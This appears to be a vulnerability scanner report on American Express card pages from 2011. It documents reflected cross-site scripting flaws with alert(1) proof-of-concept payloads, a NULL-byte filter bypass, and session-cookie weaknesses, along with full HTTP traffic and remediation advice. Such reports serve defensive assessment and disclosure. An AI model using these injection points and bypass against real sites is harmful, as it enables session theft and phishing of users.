Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:24 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b"; </script> ...[SNIP]...
1.2. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1"; </script> ...[SNIP]...
The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:11 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71876
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89"; </script> ...[SNIP]...
1.4. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.5. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:19 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb; var sj_modalToOpen = "null"; var sj_servername = "www201.americanexpress.com"; </script> ...[SNIP]...
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:09 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742089169187; path=/; expires=Sun, 07-Feb-16 14:08:09 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00001tp4Y9HDwnJc950b6Ajopjw:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:00 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742080535588; path=/; expires=Sun, 07-Feb-16 14:08:00 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000ZpAlPxhT_5TrUuiUZ9de2FR:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 199837
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-card-compare/popular-business-charge-credit-cards/29789 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0001CVQ7-fOs0FkadFJVEKHB1-6:11m1380s8; SaneID=173.193.214.243-1296742163652146; SIFR-PREFETCHED=true;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:24:15 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000vjwo6e6kJMpiXz0ETMC_G6i:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 181155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:09 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742089169187; path=/; expires=Sun, 07-Feb-16 14:08:09 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00001tp4Y9HDwnJc950b6Ajopjw:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/find-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:56 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742077484255; path=/; expires=Sun, 07-Feb-16 14:07:56 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000JxgiLPWVdjPpl3er7uWxA5d:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/see-all-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742086464167; path=/; expires=Sun, 07-Feb-16 14:08:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000FCsCyPmPIMRgSqck8m5BihS:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /getthecard/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:55 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742075628334; path=/; expires=Sun, 07-Feb-16 14:07:55 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000iR6T3EQC4v4TK6pPmyS2MV5:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/compare-cards/air-travel-reward-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:29 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000H6ppAqvf65juk908HVDxx0v:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 126709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/compare-cards/cashback-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:46 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=00004EIAQPsHiXtW8ru4YcPdSN6:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 63898
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/compare-cards/hotel-rewards-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:33 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=000033BtnlUaEblnQlGZHDezfgE:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 99155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/compare-cards/preferred-seating?btct=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat:Targeted:3&ct11=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:44 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000gyLJYoKb8a2HwMfmLJ_WUlm:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 93497
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/compare-cards/premium-rewards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:49 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000J5xJyoIqp3Y6pLj6p8fABJ3:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 105619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /getthecard/home HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:41 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742061792890; path=/; expires=Sun, 07-Feb-16 14:07:41 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000eWHgoh3xMYf3-Al0Jaz-edi:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/learn-about/Gold-Delta-Skymiles?btct=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Small_DeltaGoldImag:Targeted&ct11=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Small_DeltaGoldImag HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:04 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000lTP-6z4OraEzr8LIZbz-1gL:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 73240
